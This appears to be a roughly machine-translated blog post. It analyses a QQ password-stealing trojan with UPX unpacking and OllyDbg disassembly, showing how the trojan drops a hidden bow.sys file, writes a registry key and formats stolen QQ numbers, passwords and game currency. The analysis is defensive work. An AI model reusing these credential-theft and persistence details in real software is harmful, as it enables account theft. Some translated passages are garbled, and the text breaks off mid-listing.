Analysis of QQ black hands in the black anti-CD

I saw the official announcement of the "black line of defense", 6 strong files this month in the disc column, dynamic net vulnerability using animation tools will make antivirus software alarm, prompt for Trojan-PSW.Win32.QQShou.ed. I think there is something more dark than me. It seems like blue ...... Therefore, I analyzed this malicious program, which could be used to enhance my experience in manual superjobs, and help my friends who are in the middle of the process to clean up the malicious program.
PEID shell check first, UPX 0.89.6-1.02/1.05-1.24-> Markus & Laszlo [Overlay], n multiple shelling machines on the Internet, so I won't go DOWN, you can use the upx fileinfo plug-in of PEID to easily obtain the OEP of The UPX shelling program.

Here the OEP is: 4056D8 direct OD loading. F4, to 4056D8 put him DOWN. The shelling is complete. Check PEID again, Borland Delphi 6.0-7.0. After shelling, you can fix it. We don't run it anyway.
Let's analyze the program loaded with OD after shelling.
00404935 50 PUSH EAX
00404936 E8 71 fcffff call <JMP. & kernel32.GetSystemDirectoryA> // return to the WINDOWS System directory path
0040493B 85C0 test eax, EAX
0040493D 75 07 jnz short 2.00404946
0040493F C685 00 FFFFFF 4> mov byte ptr ss: [EBP-100], 43
00404946 8A85 00 ffffff mov al, byte ptr ss: [EBP-100]
0040494C 50 PUSH EAX
0040494D E8 E2FCFFFF CALL <JMP. & USER32.IsCharAlphaA> // determine whether the string is a letter.
00404952 83F8 01 cmp eax, 1
00404955 1BC0 sbb eax, EAX
00404957 40 INC EAX
00404958 84C0 test al, AL
0040495A 75 07 jnz short 2.00404963
0040495C C685 00 FFFFFF 4> mov byte ptr ss: [EBP-100], 43 // here Hex (43) = Char (C) C drive pull ~~
00404963 8D85 fcfeffff lea eax, dword ptr ss: [EBP-104]
00404969 8A95 00 ffffff mov dl, byte ptr ss: [EBP-100]
0040496F E8 ccedffff call 2.00403740
00404974 8B95 fcfeffff mov edx, dword ptr ss: [EBP-104]
0040497A 8BC3 mov eax, EBX
0040497C B9 B4494000 mov ecx, 2.004049B4;: program filesinternet assumerplugins
00404981 E8 2 eeeffff call 2.004037B4
00404986 33C0 xor eax, EAX
00404988 5A POP EDX
00404989 59 POP ECX
0040498A 59 POP ECX
After the program runs, a file is first created in the system directory. The path is:
C: Program FilesInternet assumerplugins
In this place, you will find an additional file bow. sys dynamic link library and bow. how can we identify the two bak files that are generated by Trojans? Check the file generation date and you will find them.
Note that this file is hidden and must be displayed to all files.
Let's look at the contents of the bow. sys file,
003E4E1A |. 50 push eax/pDisposition
003E4E1B |. 8D4424 04 lea eax, dword ptr ss: [ESP + 4]; |
003E4E1F |. 50 push eax; | pHandle
003E4E20 |. 6A 00 PUSH 0; | pSecurity = NULL
003E4E22 |. 68 3F000F00 PUSH 0F003F; | Access = KEY_ALL_ACCESS
003E4E27 |. 6A 00 PUSH 0; | Options = REG_OPTION_NON_VOLATILE
003E4E29 |. 6A 00 PUSH 0; | Class = NULL
003E4E2B |. 6A 00 PUSH 0; | Reserved = 0
003E4E2D |. 68 744E3E00 PUSH bo0000003e4e74; | softwaremsqqguishou
003E4E32 |. 68 01000080 PUSH 80000001; | hKey = HKEY_CURRENT_USER
003E4E37 |. E8 54F4FFFF CALL <JMP. & advapi32.RegCreateKeyExA>; RegCreateKeyExA
Write the registry,
HKEY_CURRENT_USERSoftwareMsQQGuiShou
What is the pinyin "QQ ghost" of "QQGuiShou "? According to Google's record, Q software is indeed stolen,
Continue analysis
: 00407715 A124A14000 mov eax, dword ptr [0040A124]
: 0040771A 8B4018 mov eax, dword ptr [eax + 18]
: 0040771D 50 push eax
: 0040771E A124A14000 mov eax, dword ptr [0040A124]
: 00407723 8B4014 mov eax, dword ptr [eax + 14]
: 00407726 50 push eax
* Possible StringData Ref from Code Obj-> "QQ shock wave gives you a gift --> ("
: 00407727 68947A4000 push 00407A94
: 0040772C FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj-> "----"
: 0040772F 68B87A4000 push 00407AB8
: 00407734 FF75F4 push [ebp-0C]
: 00407737 68C87A4000 push 00407AC8
: 0040773C 8D45CC lea eax, dword ptr [ebp-34]
: 0040773F BA05000000 mov edx, 00000005
: 00407744 E853BDFFFF call 0040349C
: 00407749 8B45CC mov eax, dword ptr [ebp-34]
: 0040774C 50 push eax
* Possible StringData Ref from Code Obj-> "number :"
: 0040774D 68D47A4000 push 00407AD4
: 00407752 FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj-> "---- password :"
: 00407755 68E47A4000 push 00407AE4
: 0040775A FF75F4 push [ebp-0C]
* Possible StringData Ref from Code Obj-> "---- available game currency :"
: 0040775D 68F87A4000 push 00407AF8
: 00407762 8D55C4 lea edx, dword ptr [ebp-3C]
: 00407765 8B45DC mov eax, dword ptr [ebp-24]
: 00407768 E8E7D7FFFF call 00404F54
: 0040776D FF75C4 push [ebp-3C]
* Possible StringData Ref from Code Obj-> "---- saved :"
: 00407770 68147B4000 push 00407B14
: 00407775 8D55C0 lea edx, dword ptr [ebp-40]
: 00407778 8B45E0 & n